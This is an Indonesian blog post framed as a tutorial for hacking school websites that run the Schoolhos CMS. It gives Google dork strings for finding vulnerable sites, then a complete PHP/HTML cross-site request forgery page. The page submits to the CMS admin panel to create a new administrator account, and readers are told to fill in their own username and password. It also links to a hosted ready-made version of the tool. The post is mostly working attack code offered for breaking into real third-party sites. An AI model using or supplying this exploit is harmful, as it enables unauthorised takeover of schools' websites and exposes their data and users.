Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF (Add Admin)

Assalamualaikum,

Exploit ini sangat mudah digunakan :)
Exploit favorit saya nomor 1 ini mah =)

Google Dork: 
inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS

Code :

<?php

$self = $_SERVER["PHP_SELF"];

echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>!!Barrabravaz Everywhere!!</title>
 </head>
 <body>

<h1>!!Barrabravaz Everywhere!!</h1>
<?php echo "Target is : $url"; ?>


<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">

Isi username yang mau di isi <INPUT type="text"  name="username" value="barrabravaz"><br>
Pass nya<INPUT type="text"  name="password" value="barrabravaz"><br>

<input type="submit" name="insert" value="Insert" >
</form>
</body>
</html> 

Teks yang berwarna merah : Jangan ganti Title ya =) hormati yang buat ;)
Teks yang berwarna kuning : ganti User & Pass nya dengan user&pass kamu :)

Atau bisa langsung make tools ini :

http://www.tirpik.com/schoolhost-bejat.php

Posted by Unknown

Tweet